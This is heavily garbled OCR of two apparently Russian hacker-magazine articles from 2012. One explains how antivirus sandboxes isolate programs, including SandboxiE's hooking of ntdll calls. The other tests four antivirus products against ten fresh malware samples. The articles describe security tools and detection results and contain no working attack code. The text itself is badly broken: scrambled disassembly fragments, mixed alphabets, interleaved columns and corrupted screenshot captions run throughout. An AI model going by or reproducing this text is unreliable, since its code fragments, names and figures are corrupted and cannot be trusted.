76fbB7c:7 90 76fЫ7с:8 е9с:Э7 4 2ВО6 ntdlliNtOpenEvent

~~:~=~~~ ~~~OЗfo?f

7HЫ7ddЬ.OOOЗfe1f 76!Ь87e2fl 1 2

!fSOШJJ •C Ш · UDJ.utt.otii:IOUIIflЩ (fSO?IFIJ.CШ · IIDJ.tHII-ooooRift1Щ

76fbB7e4c:20c:OO

( 1ffeOЭ OOJ

ась

jмр Sbl.eD 1 11SЬi oD11 GetHand1ePath +Ox9e SO (7d2Эfc:90J ~~=~~~~~~~~~~~~:illj},

dvo~

00 )

ptr [edx}

OCh

~ ~1 ~~ ~~~"ЬеЬiООО~~О i r

( FXIШ1HШ · IID I .fifl~llftl!:I J

[FI071FIHIII•\ IOI .. it\'1.000ШIFUЩ

edx . c:~ffse t Sho.redUaerO..taiSyate• Cal !Stub dvo rcl ptr (edx]

nc:~p

7 6 fЫ7d4 с:20с:ОО 76fЫ7d7 90

[FI071HHJSHID1-&910-0000FIIFШ11

З Оh

u.~t .O B9h

c:a ll

adlt . of f aet SharedUnrO..tal Syata•C. 11S tub ( 1f fеОЭОО ) dvord ptr (l:dx) ась

76fЬ87е?~!~ОИ*!~:-~~!!~~~~~~~~~~~~~~

( fS01tf)j-CШ·IIOJ*ВoOIXIOIIIfiШJ

(fXI11fJH5JI · IIOJ·191f-OO:IOfllfE2ll l

!\

( fS0 7 1f11~1 · 110) . .1f«<XXfflffJ11. ) \ F:107111 1· 01\•iiOJ . -oOI))OAJfШ1 )

dvc:~~

ptr (edx]

IOb

{ f~)I .Q SI · IIO ) .мti-OOOOFI\fi.U1 )

!Ldl$ lнa русском! или на JIШ!n.mlп~ com/en-usliibraгy/ ~ lnо­

-

анrлийски)

Содержани е двух

nредыдущих статей цикла ищи нашем

ОО)

ди ске.

( FmJ!f11 .(SSI·IJOH911.oocort!fШ!. )

!:~~:~~ -~~~~-==:~~ Перехват некоторы х функций и з

Замена стандартного обработчика Jаvа-скриптов на собственный , выполненная н днтивирусом Касперского ~>

то это повод навострить уши. Тем более, что

iframe

используется все реже и реже.

Что касается зашифрова нных, обфусци ­

ntdll.dll, выnолненный nесочницей SandboxiE

!nодложные фу н кц ии находятся в библиотек е SbleDLL.dlll

программ с контролируемыми nараметра-

смо тря на это, данный подход является основ­

ми многие объясняют аналогией с детской

ным в большинстве продуктов ISandbox iE,

песочницей. Что ж, такая версия тоже имеет

Bu ffe гZone, изолированные среды антивирусов

рованных или еще незнакомых антивирусу

право на существование, но лично мне ближе

Ka speгsky lnteгnet Secuгity,

вредоносных скриптов, то выходом является

другая. У пожарных «nесочницеЙ>> называется

Secuгity Рго,

эму ляция их исполнения с последующим

специальный бак с песком, в котором можно

анализом по сигнатурам или с помощью эври ­

безоnасно экспериментировать с легковоспла ­

стики.

меняющимися веществами.

Для выполнения Jаvа - скриптов исполь­

В антивирусных песочницах можно выде­

Comodo lnteгnet Avast l nteгnet Secuгity).

Изоляция на основе nравил

В се попытки изменения об ъектов файловой систем ы или реестра не виртуализируются,

зуется движок, который представляет собой

лить три базовые модели изоляции nростран ­

а рассматриваются с точки зрения набора вну­

D L L-мо д уль

ства от всей остальной системы.

тренних правил средства защиты. Недо с таток

jscript.dll.

Он нах одится обычно

в папке % windiг%\system32, содержит реали­

такого подхода тот же, что и во втором случае

зацию набора СОМ-интерфейсов и использует­

Изоляция на основе nолной виртуализации

-во змо жность выхода зловредного при­

ся

Заключает ся в использовании движка

ложения из -п од контроля песочницы. Однако

IE для

лено три

выполнения

JS.

В

Windows

опреде­

GUID !уникальных идентификаторов)

вирт уал ьной машины в каче стве защит ного

в этом случае гораздо проще осуществлять

СОМ-объекта- движка интерпретатора

слоя над гостевой операционной системой.

обме н данными между контролируемой средой

ск риптов Jscгipt. Это

{f414c260 -6ac0-11cfb6d 1- ООааООЬ ЬЬЬ58}, {f414c261-6a сО -11 cfb6d1-00aa00bbbb58} и {f414c262-6ac0-11 сf­

Такой подход дает очень выс окий у ровень

и ос н о вной системой. Пример - Windows Useг Account Contгolixopoшo всем известный и мно­

статки очевидны- большой объем, большое

гим надоедающий контроль учетных записей

Ь6d1-00аа00ЬЬЬЬ58}. Е сли поискать в реестре

потребление ресурсов системы и сложнос ть

Win dows!.

эту строку, то можно уви д еть, какой модуль

обмена данными между основной систе мой

зарегистрирован в качес тве интерпретатора

и песочницей.

защиты основной рабочей си стемы. Недо­

В св язи с тем , что наиболее широкое при ­ менение получил в т орой подход, стоит его

рассмотре ть подробнее на примере широко

JavaSc гi pt. Как уже было у п омянуто, обычно Изоляция на основе частичной виртуализа­

распространенной песочницы

подменить эту ветку реестра и заре гистри­

ции файловой системы и реестра

ло вая система вирт уализ ируется достаточно

ровать в сис теме сво й обработчик скриптов,

Совсем не обязательно использовать движок

пр о сто- путем создания дубликатов паnки

который и буде т выполнять анализ их вре д о ­

виртуальной машины для изоляции выполне­

текущего п ользователя, дубликатов журна­

носности и «nущать или не пущать».

ния nрограмм. Можно просто подставпять про­

лов транзакций общей файловой системы

это

jscript.dll.

Н о ничего не мешает антивирусу

SandboxiE.

Фа й­

анализируются только с крипты, выполняе ­

объекты файловой системы и реестра, а их

и папок, имитирующих накопители !внутрен­ ние и внешние!. Также создается дубликат

мые в браузерах, использующих стандартный

дубликаты. Попытка их изменения приведет

реестра.

JаvаSсгiрt-движок

к изменению лишь их копий внутри песочницы,

Недостаток такой подмены в том, что

Windows.

КАК РАБОТАЕТ ПЕСОЧНИЦА

цессам, запущенным в песочнице, не реальные

П осле того как созданы дубликаты фай­

реальные данные не изменятся и не п ост рада­

ловой системы и реестра, задача песочницы

ют. Основной недостаток так о го вида песочниц

с водится к перехвату всех функций работ ы

Почему-тоnроисхождение названия « nесоч­

-n робои или обход, и в результате - выход

с файлами и реестром. Если приложен и е,

ница>> для изолированной среды исполнения

вредоносного кода в основную систему. Н е-

обращаю щ еесяк реестру или пытающееся

соз дать/изменить какой-либо файл, запуще но не и з-по д песочницы, то управление пере­

дается оригинальным функциям . Е сл и же

В АНТИВИРУСНЫХ ПЕСОЧНИЦАХ МОЖНО ВЫДЕЛИТЬ ТРИ БАЗОВЫЕ МОДЕЛИ

ИЗОЛЯЦИИ ПРОСТРАНСТВА ОТ ВСЕЙ ОСТАЛЬНОЙ СИСТЕМЫ

такое приложение выполняется в пе с очнице, то вместо настоящего реестра и настоящего внешнего накопителя ему посредством

перехваченных функций подсовываются их дубликаты. П оско льку функций , с помощью которых

можно работать с файловой системой и рее­ ст р о м, много , то и перехватов приходится де-

ХАКЕР

078

www.epidemz.net

04/159/20 12


С антивируса ми поконч ено'

лать много. К примеру, Saпdboxi E производит

эвристического анализатора. Так работают

Д ля песочницы из состава Comodo lпterпet

перехват

песочницы из состава большинства анти­

Security основной режим- режим пос т оянной

вирусных продуктов [в частности Kaspersky

защиты с эвристическим алгоритмом принятия

lпterпet Secu r ity и Comodo lпterпet Security

решения. Однако помимо это г о существует

Рго].

возможность ручного запуска при л ожений

56 функций из пtdll.dll, 68 функций из user32.dll, 71 функции из advap i32.dll, 6 функ­ ций из kerпel32.dll и 1 функции из ws_32.dll. Теперь пара слов про м етоды принятия решения о помещении выполняемого приложе­

в песочнице.

ния в песочницу, а также о режимах ее работы.

Чт о касается режимов работы, то их тоже

ЗАКЛЮЧЕНИЕ

Методов приня'тия решения по большому сче т у

два- режим постоянной защиты и режим

два.

руч н ой защиты. В первом случае приложение

Конечно, некот орые детали остались за

автоматически помещается в песоч ниц у либо

кадром, да и разработчики в антивирусных

На основе правил

выполняется вне ее в зависимости от резуль­

лабораториях все время изобретают что -то но­

Модуль принятия решения обращается к вну­

та т а работы модуля принятия решения при

вое, пытаясь догнать и пере гн ать соз д а т елей

тренней базе правил запуска приложений и в

старте приложения. В о втором- пользователь

вредоно сного программнаго обеспече н ия ... Н о

зависимости от них запускае т приложения либо

сам принимает решение о запуске процесса

главное, что все эти антивирусные премудр о­

в песочнице, либо в основ н ой системе. Такой

внутри песочницы. К примеру, для SaпdboxiE

сти обрели порядок и свое место на много ­

подход применяют Saпdbox iE , Bu fferZoпe.

[песочни ца на основе частичной виртуализа­

численных полочках в твоей голове. А там,

ции] основным режимом работы является ре­

глядишь, и ты придумаешь что-нибудь такое,

На основе эвристических подходов

жим ручной защиты, но при покупке лицензии

что произведет революцию в антивирусном

В этом случае решение о запуске в песочн иц е

можно активировать режим постоянной за­

дел е, и редактору придется выделять место

принимается на основе результатов работы

щиты с принятием решения на основе правил.

под новые статьи в нашем журнале. ::Х:

!@~<>JO «

Sandbox > Drobotun >( DefaultBox

•J

'Чfn'!l:r.I'L~-. 'Тo11 , .. "- •. ,

11iL.

Имя

(nусто)

"- на3sани! тtкуще:~1 nесочн ~щы

_/~

~

дуб1щкат файлоsой

снетемы же:сткихд11СtФе н ане:шм их 11акоn~1Те:Jш'1

~ Ду6JН1К!IТП!Iпtщтекущеrо П0ЛЬ30!!1Т!ЛА de:sktop.ini

_________________________,

r'"-: D_ O.,. N.,. т-_u_ SE_.т__xт . . . . _. Re:gHive:

RegHive.LOGl RegHive.LOG2 RegHive(бbl8ead4· 0eac·ll el·90d4 ·00188ЬЗf4с92 }.ТМ . Ыf RegH ive(бЫ8ead4-0eac - llel-90d4 - 00188ЬЗf4c92 }. TMContainer()0000000000000001 .regtrans·m s RegHive(бЫ8eod4-0 eoc·llel- 90d4·00188ЬЗf4c92}.TMContoiner00000000000000000002.regtrans-ms

""" дуб!IНК!IТЫ Jot<ypHMO! ТР!IН3!1НЦ11Й общей фl!I\~1/\О!ОЙ СИСТ!МЬI Общий nринциn изоляции файловой системы в

SandboxiE

1

Виртуализа ция файловой системы в SandboxiE lв nапке dгive на х одятся nаnки , имитирующие внешние накоnители!

В случае исnользо­

ОБЛАЧНЫЕ ТЕХНОЛОГИИ НА АНТИВИРУСНОЙ СЛУЖБЕ

вания песочниц для изоляции выполняе­

мого кода следует помнить, что многие

Началом применения облачных технологий в антивирусном

еще не скача на, автоматически проис ходит обновление баз.

деле можно , наверное, считать предоставление

В сигнатурах содержится не только часть тела вир уса или его

а нтивирусными компаниями возможности онлайн-проверки

хэш, но и некоторые типичные сценарии повед е ния , кот орые

файлов на вредоносность. Эта возможность существует

позволяют однознач но определить вредоносно сть программы.

и по се й день, но под облачными те х нологиями в сфере

В антивирусах от ко мпании

а нтивирусной з ащиты сегодня понимается уже совсем

название << Облачный анализ поведения приложений», и с

другое. Почти все крупные антивирусные компании

его помощью подозрительные файлы отправляются на

используют облака в качестве огромной антивирусной базы,

дополнительный анализ.

причем фактически пополняемой самими пользователями ,

Говоря про облачные технологии в сфере борьбы

давшими со гла сие на участие в программе пополнения

с вредоносными программ ами, нельзя не уnомянуть

и уточ нения информации о вредоносных и пот е нциально

<< Лабораторию Kacnepcкoro » с ее

вре доносны х объектах. В разных антивирусных компаниях

rity Network . K5N-

э то называется по-разному. У

позволяющая пользователям пол учать оперативные

Comodo

та же самая фигня носит

руют далеко не всю

систему. Как nра­ вило , зто несколько

критически важных

объектов, наnример : папки Ргоgгаm

Files, Windows, Useгs\%AIIUse­ гsPгofile %\Pгogгam

Data, Documents and Setting и ветвь реестра HKLM\ Softwaгe.

Kaspersky 5ecu-

сеть информационной безопасности,

Microsoft 5ecurity E sseпtia l -«Служба динамически х сигнатур 055 [Oyпamic 5igпature 5ervice] ». Если на выходе проактивной защиты файл будет

данны е о репутации программ и веб-сайтов , оперативно

расценен как подозрительный lк примеру, пытает ся изменить

антивирусн ы х nрограммах от << Ла боратории Касперского >>

си стемные файлы), но сигнатурный анализатор на него

реализованы функции веб-филыра, антифишинговый

реагируя на появление новы х угроз . С помощью

K5N

Про обфускацию Jаvа-скриптов очень хорошо написано

в новы х

никак не отреагировал , то создается профиль этого файла,

модуль, функция контроля программ lрейтингование софта

который отсылается для анализа в специальные сервисы

no

Microsoft- 055, 5pyNet и MR5 !Microsoft Reputation 5ervices).

ПК и nереанальным данным) и модуль анти-спам, который

В случае, когда в базе обновления сигнатура уже есть, но она

обращается в

ХАКЕР

из них виртуализи­

в статье н JavaScгipt : игры в прятки н

в девятом номере][ 2011 год .

за

признакам опасности при назначении доступа к р есу рсам

K5N

за образцами спам-nисем .

04 /159/ 2012

079

www.epidemz.net


MALWARE

deeonis ldeeonislagmail.coml

Не известная ИСПЫТЫВАЕМ ЭВРИСТИКУ АВЕРОВ НА САМЫХ НОВЫХ В ИРУСАХ Как и з в ес тно, антивирусное ПО работает в полную силу т о лько в том случае, если своевременно получает свои

апдейты . Об этом догадываются и вирмейкеры, которы е выпускают новые версии зловредов чуть ли не каждый д е нь .

Сегодня мы проверим, насколько хорошо аверы справят ся с самыми свежими экземплярами вирусов и троянов ,

к оторы х еще нет у ни х в база х.

егодняшние испытания мы будем

граммнога обеспечения. Вирм е й к еры в своих

!три из которых были nожаты

проводить на реальных зловредах,

ТЗ выделяют А виру в отдельный пункт, а по

дочных файла с расшире н ием

которых написали реальные киберз­

уровню прич и няемой головной боли этого

нутри были похожи один на

лодеи для своих реальных киберзлодейских

а вера можно сравн ит ь разве что с

ziр-архив. Всего получилось д еся т ь з лов ре д ов.

нужд. Н апомним, что для всех наших предыду­

портит нервы добрым и трудолюбивым вер­

щих тестов мы писали собственные сэмплы,

стальщикам и wеЬ-кодерам.

с

IE6,

который

lpe, кото р ые из­ pdf, а другой- на

Само тестирование у нас буд ет проходить в два этапа . На первом эта п е мы натравим антивирусы с несвежими базами на найде н ные

которые хоть и не были нас т оящими зловреда­ м и, но усиленностаралисьими предста виться.

UPXI и два зага­

УСЛОВИЯ ТЕСТИРОВАНИЯ

трояны и запишем результат. Таким образом мы

Настоящие же трояны должны по казать, кто

Для тестов мы засетапили на вирутапку све­

правери м , насколько хорошо аверы сnравляют­

из производителей антивирусных программ

женькую

ся с новым, неизвестным им вре д о н осным П О.

лучше отрабатывает деньги, с таким трудом

а затем начали устанавливать антивирусы,

Вторая часть испытаний состоится через неде­

добываемые их клиентами. Но чтобы проверка

попутно создавая снапшоты виртуальной

лю после nервой. Мы дадим антивирусам время

была еще хардкорней, мы раздобыли пачку

машины для каждого из аверов, чтобы они

на обнаружение и детект наших зловредов, за­

самых свежих представи т елей патогенной

не мешали друг другу. Затем мы быстренько

т ем обновим базы и просканим вредо н осов еще

киберфауны, а для большей надежности еще

проапдейтили базы сигнатур до актуального

раз. Это позволит нам узнать, насколько плохо

и отключили автооб н овление наших испытуе ­

состояния и оставили все зто хозяйство на не­

nротивовирусное ПО сnравилось в nервый раз.

мых примерно за неделю до отлова зловредов.

делю в темном п рохладном месте без интер­

Кстати, об испытуемых ан т ивирусах. Сегод ­

н ета, чтобы наши испытуемые ненароком не

ня к нам в лабораторию попало следующее за­

щитное ПО: Kaspeгsky

Space, ESET NOD32

CRYSTAL, Dr.Web Secuгity 5 и Aviгa Fгее

Smaгt Secuгity

Antiviгus. Все претенденты на звание лучшего

из лучших !или, наоборот, худшего из худших!

Windows

ХР sрЗ со всеми апдейтами,

обновились.

НАЧИНАЕМ ТЕСТИРОВАНИЕ Итак, мы подождали, пока антивирусные базы

Через неделю мы пошли за свежей малва ­ рью- описание этой разношерстной компании

достаточно устареют, и начали тестирование.

Сегодня а веры будут идти в алфавитном поряд­ ке, позтому первым пойдет Aviгa Fгее

ты можешь видеть на врезке.

Н о кое-какую исследовательскую работу

Antivirus.

Для чистоты эксперимента мы вообще вы­

нам уже давно знакомы. Стоит сказать лишь

мы все-таки nровели - открыли вирусные

дернули сетевой кабель из машины, на которой

про ПО от немцев - пусть тестируемая версия

файлики в hех-редакторе и посмотрели на них

собираемся проводить тесты,- современные

Aviгa и бесплатная, но она давно считается

с полминутки. В итоге мы смогли рассмотреть

антивирусы очень любят скрытно обновлять

одним и з самых параноидальных антивирусов

два swf-файла, оди н

себя, сливать ин фу о файлах на свои сервера

среди современного зоопарка защитного про-

J аvа-скрипт, четыре исполняемых ехе-файла

Visua l Basic Script,

од и н

и использовать всякие облачные т ехнологии.

ХА К Е Р

080

www.epidemz.net

01./159/2 012


.

Не извест н ая угроза

!'-i ПодробныНоfчет - ЗilЩНfdtеомлью-;ерd

,_

-- - - - -

----

-

--

rJ§~

Scarrrlg completed. Df .WеЬ Scarner detected lh'eats.

Jt' .., Тhreьtsdclteo:ted

3

Cl

1 Flle rwпe

Tl1reat

ЫlбЬ.\>е

!nf".... retj ~q-iv<?

dataOOl

C'I)Ьt.SWF 19Э

EJ

объект

1

?[Ccr ;;.;, e

Просерка на вирусы: заверwwо ш~мьwе Jlинуfы на]аД

О 12/ IZ/201 1 4:02:45 дМ

(собыr*

4,

объеrпов Э7, upettя.

00.00 08)

34.4~" )«1ywe~

0

12/12/201 1 't:02:<17 АМ

Обt14ружено: НEt...R:Exploit:.SCript:.Generic

~ C:\wus\Ьuffer _foldet\ЬII6Ь.~/dMaiXIOO

0

12/ 12/2011 <1:02: 48 дМ

обнарупно: НELR: Tro}МI.WП32 .Gef\enc

~ C:\wus\Ьuffer _folder\sмnpie.dt:a/lf'X

V 12/12/2011 <1:02:53 дlol

34Аач4 3CI8ePUJI!Н4

C:\vrus'IJ<йer_~\j)llбЬ.\>e

==c::J=9 • r:J

1-·

Trr !}<....1.f'.\.Юrop lO 1 1

"' score.swf_

Dr.Web

laxe

ЭЭ

NeutJakzE::

Patt1

Actior1

CPOF

sample.dta

&!~ событнА

Ре)уnьтат

Тhre~sneut.r~:O

C:\vrus\DUffer_folder\sample.dta C:\vrus'l>uffer_~\Seoreswf_

Ре зультаты Кас пера без обновленных баз

с правился с неизаестной ему угрозой лучше всех

~"'"'==--"э~ ,

lt

hiQhry r€ rvnrno?f"'I(.<IO th.:lt :r. dlnQ to ~ttm

T/'v~4ts

deteded:

threasneu.rMled:

detected threatj

ЬЕ 1"11

;tr·

<f nme:dat.el'(. Of .Web ~r'V"'er wt apply

, _,. .. ....... (, ..... . . 3 .. ....... _ " , _, ... _ )

O IZ/Itt:ltll ..

>l._.,., _ _

0 L.:JL'1'%1111 .. >14'1""' _ _ .... :!too< 0 L".,<(:'fol•• ..... --..-~--01

. ,",_, ........ _ _ ,__ ,.... I:Jitn911••'81 ... ·--·-z:•-.o(A

4

l<ll•totl•"~ . . , . . - ....... ~- ... ".

О

O шl-'1011~·"'-

.. ,U1 .. ... ~ :~::::~=~= 1811··~

o/IZ/IW:OII . . . . . . . О от".,.".,,.

• ..,

-..._,_,....,.. ~-(----01

Threat

77 14 . 1899 . ехе_

Гr

d.l950

5М'

"'"'-···-...

Actioв

Path

...... .._

-W:too<

[О.. е

C:\vrus\Ьuffer .. \7714.1899.ехе_

1с...

===:r:1·

O utlti'IOII····

E~t.POf

samp!e.dta

Tro~.t-1uiOtoo.20121

C:\vrus\Ьuffer _folder\sai'Т1!Jie.dta

~~~-~.t~

C:\wus\Ьuffer_folder\score.swf_

"" score.swf_

dataool

Е

l635

C:\wus\Ьutr.._fdOO\bllбЬ.\>e

~--1w--J-

,, .......

~-~...,..,.~ogr···"'-­

.. " _ _,_.,.... ,..,_ ~~==::-=-~(~--~.,..__... ...,..,,_.,,, ;lt-~~.,_..,.,_

;ас.~~-._._,_,-..., ;1~---·-ftJ:t.c

~--·~- ;;~~----..........-. ;rf~-------

0 >11\tnllll··· ... _ " .

ЬllбЬ.\>0

::t'~J*----""'

.'!1',..__-,..,,...,_...".

::=";'"....:=·.. ~--~---

0 >:11"1:0\1~·-- ... ~-·----...", ...... 0 11/1-11·-... .,._."_fo .... --t"<<.,.ll-l>loll

Object

~C,-~---

с;;'-~-..,~

~_,_., _

_,.,.,._

.. IJ/Itnl81! ....... ",.._......,... . ._ . .

;а:с·-~-·-• ~(

.. -~·J..•.•-.Jo-.4

JJI/ItniiH,.f> ... • - - ( - - :..... _."...,

::JC~.._......,__

O •lll.,..••••и

::::Jс 1 .......,_..,.ом ~_,.._,. .. _,_.,._ ........

...

--·-~,,....

JJrt•otao•••• ...... · - - - - - - · O o>/IQII.JI'!o ... - W , . , . .

O lrti.,.II•JI'IS"" Il!IW:OII6JI''.., Jцtltr.lll

~·-t

_ _ _ .,

----·-lf"'"""" . . '"

. . . . . . . . ._ _ _

,_~

O il/l<t:llo,JI!!'"'-"'

....

...IW'-

;:tC\._."·011""' ... ~c~-""'

::Jt\,._o<tf!O]ootro ::::)С\

___ _

:::J-.-,...

0 ::'::~~~::: ~=---;'""-=~ ~~~=

:dcit.SWF m

Kaspersky отжог: total detection

Доктор Веб совсем плох, свежие базы сигнатур ему не помогли

Поэтому, чтобы все было честно, доступ к сети

каче с твенно выделить сигн а т уры , мы не знаем ,

у ж е под другим именем IHEUR:Tгojan.Win32.

был жестко ограничен. Также мы отключили

но факт остается фактом,- т р ой о бнаружен.

G e neгicl. Программка-загр узчик своих старших

файловые мониторы и прочие фоновые про­

Остальные два детекта- зт о экс плоиты.

б ратьев стабильно детектится нашими анти­

верки, чтобы эти компоненты защитного ПО н е

Первый эксплуатирует уязвим ос т ь в формате

виру с ами. Второй угрозой был рdf-эксплоит,

мешали скопировать наш минизверинец на ПК.

pdf, о чем недвусмысленно гов орит название

об н ару ж е нный Доктором Вебом, но имя по вер­

вируса 1Exploit.PDF. 263ЗI, а в торой покушается

с ии Ла б оратории Касперекого у него немного

хивчик со зловреда ми в с пециально отведен­

на Flash - Exploit.SWF.193. Стоит н апомнить,

друго е - HEUR:Exploit.Scгipt.Geneгic. Видно, что в об о их случаях отработала эвристика, но

Но вернемся к испытаниям. Распаковав ар­ ную для них директорию, мы кликнули по этой

что у нас было два swf-файла , н о о па с ным

директории правой кнопкой мыши и выбрали

был признан только один. Так же с л е дует

непонятно, поч е м у в отчете нет информации

пункт Sсап. Не слишком расторопная А вира

сказать, что эксплоиты обычно не с одержат

о третьем опасном файле, ведь в первоначаль­ ных результатах говорилось о трех угрозах.

немного призадумалась, но затем все же заня­

какого-либо вредоносного кода , а с лужат лишь

лась сканированием, после чего выдала окно

для загрузки настоящих вирусов . Aviгa Fгее

Мы не можем сказать, был ли детект третьего

с результатами. Из десяти вредоносных файлов

Antiviгus не обнаружил этих файл о в - возмож­

зверька, а потому засчитываем только два

Av iгa обнаружила только оди н , обозвав его DR/

но, потому что по надеял с я перехватить бол е е

положительных срабатывания эвристики, что

Delphi.Gen. Благодаря гуглу, официальному

серьезную угрозу !но, как оказалось в итоге,

дает нам результат 2/10.

сайту и помощи Каnитана Очевидность мы

сделать этого не смог!. Доктор Веб же поступил

выяснили, что своему детекту зловред обязан

более nродуманно, попытавшись о безвредить

все тех же файлов завершилось сообщением

эвристическому движку антивируса. Таким об­

заразу на ранних этаnа х настуnл е ния. Tгojan.

об одной найденной угрозе. Самые догадли­

разом, эвристика сработала, но не совсем так,

Mu1Dгop.20121 также является загрузчиком

вые уже , наверное, поняли, что это был тот

как того хотелось бы германским п рограмми­

других вирусов.

самый ехе-загрузчик, который попался трем

с там. Результат 1/1 О хоть и лучше, чем ничего, но как-то не внушает особенного оптимизма. Следующим идет Dг.Web Secuгity Space.

Итак , Dг.Web обнаружил три угрозы из десяти, что лучше , чем у немецкого антивируса,

П ослед ним идет

NOD32. Сканирование

предыдущим антивирусам. На э тот раз его имя

было Win32 / lnjectoг.FP. К сожалению, мы так

но все равно недо с таточно хорошо для защиты

и не смогли понять, сработала ли тут сигна­

Зеленый паук был натравлен на ту же самую

системы. Следующий у нас в списке Kaspeгsky

тура в базе или эвристический движок, но

папку. Сканирование прошло быстро, и его

CRYSTAL. Забегая вперед, скажем, что его

одно очеви дно: результат 1 из 10- это плохой

резул ьтаты оказались п олучше, чем у пред­

результаты нельзя трактовать однозначно, но

результат.

шественника. Главной угрозой ста л все тот

обо всем по порядку.

же DR/Delphi.Gen, но уже с новым именем - Tгojan. Mu 1Dгop.20121. Судя п о названию,

мы nолучили сообщение, говорящее нам о трех

По сле того, как мы проте стили аверов не­

файлик был об нар уже н с помощью конкретной

обнаруженных угрозах . Чтобы рассмотреть

известными для них троянам и, мы оставили

сигнатуры, которая была в базе уже д овольно

получше, что же там нашел каспер, мы решили

их в покое на недельку, а потом обновили

давно. Число 20121, видимо, означает размер

взглянуть на подробный отчет, но тут нас ждал

базы сигнатур. За неделю любой уважающий

вредоноса, но у нашего зверька этот размер

сюрприз- в табличке с найден ными злов­

себя антивирус должен переловить всех на­

немного отличается-

реда ми было всего два файла. Первый- это

ших зловредов и научиться безжалостно их

уже хорошо известный нам DR /Delphi.Gen, но

уничтожать. Н у что же, проверим, так ли это

20992 байт. Повезло

доктору, или ему действительно удалось та к

ХАКЕР

П осле сканирования вирусной директории

ВТОРОЙ ЭТАП ИСПЫТАНИЙ

081

04 / 159/2 012

www.epidemz.net


MALWARE ~ luke Filewalker

~

111

- - ~~ - -

А virus or unwante d progr am wa s found !

А viru s or unwanted progra m was foundl

CKi'I Hit posa ннe к омnьют ера

-

6

6

неlр

ко~~"tо:тtо npoщм~OOI.f"".O: od~•••ot. Н

Help

Please select the action(s) to Ье performed.

Detections

Detections Detection

1

Кo.Jiм.,tC\'1.0 API>oltм~""' о6~-.-тоt: 1 КOJI"" to:тtoow~ .. tм•OIX06\t....,ot; (1

Please select the .!!Ction(s) to Ье perfmmed.

1

~

Моvе

Actlon

NODЗ 2 - совсем как OЬiect

_j

to Qu~antlne

w.php@f-78#e-O.exe_

T R10Ьlusиte .OG. 8З

Мо\'е

to qu~cюtine

sample .d:a

~

Моvе

to qu~antine

Моvе

to quarant:ine

m.!lin.php@pё:oe=98dЗЬfб . .. HT МL!Q!a . oown .c.z

Avira

Action

Detection

d8fda25a

вostsnoщt .Ьoqvo

Моvе

to quarantine

Ы tбЬ .Iре

~

Мо\'е

to quaranti'le

771'1 . 1699.ехе_

TRIOffend.KD.465792. 15

МОvе

to QU;Y.,ntine

Скан 11рование комnьютера

ш~~w.а ~~~~~w о61.•~'~о•: Кott~~tniO ugJ"<I~~ouo; o6\to.'tOI: 6

~-------------------------г

V1rys lnfgrmat!on 1

APply now

]

1

29

Кo~ .... w.a<>"" ..-on:o&ot.-тo•.O

-----

c.,.......,Ofo_~J7t•~ttttц_·ooo~Wn)11'fl>'PtrМO.•--­

Г

opyf~tOQI.'Oor

~ancel

Ь.''!ft'

~ly now

\lirus information J

1

t.ancel

cw.u. .. !'lw .Wd8r"IIIIIIIW C .........

..t"-~---

_lo»>J~I..f_ 1\t>•fТ·o~"""'l.lCZ,_"__

C~f>.Ao _ . . , _ ... -----~w.н·--С

...,~Н.,_It:Jd.,._.

.... I.·S\'I';focolcoTЧO<'Ic;т_.~

(

,.-o,ffr.}tll:8l." hf'•111•o..Oe•

~W...J~IICI,r..,.\Gc;т-~

После обновления у Авиры все намного л уч ш е

NODЗ2 обновился и нашел шесть з ловр едов

на самом деле. Со свежими базами Авира по­

чие разоблачающие действия, к о т о рые были

n о л у ча ют Aviгa и

казала себя ровно в шесть раз л у чше, чем на

выnолнены в процессе пров е рки. В итоге

n ус ть они сами решают, у кого на полочк е

Скромные р ез ультаты

Avira Free Antivirus

он будет стоять!. Всего один обнаруженный

первом этапе, но четыре файла так и не были

Kaspersky Crystal

идентифицированы спустя неделю после их

ружил все десять зловредов, большинство

зловред в первом испыта нии- это чуть

выхода в дикую пр ироду. Также интересно,

из которых были уничтожены в первые же

лучш е, чем ничего, а шесть троя нов после

что Aviгa обнаружила рdf-эксплоит, который

секунды, хотя два файла по н еnо нятным нам

обновл е ния баз можно назвать улучшением

ранее не видела, хотя его коллеги ругались

причинам так и остали с ь л ежат ь на жес тком

ситуации на

на него в первую очередь.

диск е. Такой результат заслуживает ув ажения,

равно бу д ет инфицирована, даже если вы

лю назад не обнаруживалея ни одним авером,

кот орое, однако, может быстро рассеяться,

регулярно об новляетесь••.

на этот раз попал в поле зрения немецкого

есл и мы вспомним результ аты nервой части

защитного П О, назвавшего его HTML/Dicг.

те стиров ания.

Oawn.C.2.

JS,

который неде­

Остальные детекты- это ехе­

ESET NOD32

со свежими б азами об на­

ESET [кубок один, потому

600%

или <<ваша система все

Кубок <<За лучшие базы сигнатур •• nо­

лучает ан тивирус Касперского, 10/1 О- это выстуnил с результатом, и ден­

действительно впечатляе т. Пр авда, если ты

файлы, а swf-эксп лоиты были отпущены на

тичным Ав ире -ше сть из десяти. Правда, на­

свободу. Шесть из десяти- таков результат

бор детектируем ых файл ов немного отли чался

схватишь совсем свеженький вирус [а настоя­ щие киберзлодеи об этом позаботятся! , то т ебе

Aviгa Fгее Anti v iгus со свежими базами.

- больше экс плоитов , м еньше ехе-фай лов,­

скорее всего захочется расколотить это т кубок

но это не особенно влияе т на общую оце нку.

об голову п обе дителя.

Теперь очередь D г.Web. По сле обновле­

ния баз мы не увидели такого nрогресса, как у nредыдущего антивируса. Всего лишь четыре

А теперь настало время для подведен ия

из десяти: к списку вредоносов добавил ся один исполняемый файл, который окрестили как

Антивирусу Dг.Web достается сразу два

кубка: «За самую отчаянную борьбу с неиз­

и т ого в .

вестными д оселе зловреда ми•• и <<За самый

НАГРАЖДЕНИЕ

отстойный детект с обно вленными базами••.

Tгojan.SMSSend . 1950. Б ольше ничего подозри­

Мы решили, что называть лучшего в этих

Слишком медленно добавляете сигнатуры,

тельного доктор не обнаружил.

исnытаниях будет не совсем правильно,

госnода, слишком медленно.

Ка спе рекий проявил себя иначе. Про сканив

nоэтому вместо перв ого, второго и так да ­

На этом мы прощаемся с тобой и сnуска­

лее мест мы раздадим кубки за достижения

емся обратно в наш подвал - лабораторию, где

большое число инфицированных объек т ов,

в различных номинациях. П е рвый кубок­

займемся новыми бесчеловечными опытами

что скорее всего означает расnаковку и про-

<< За самые nосре д с твенные результа ты •• -

и тестами.

директорию с вирусами, он выдал неприлично

I

А ЧТО ЖЕ ЭТО ЗА ВИРУСЫ ТАКИЕ? Чтобы т ес тирование было максимально честным, мы собрали

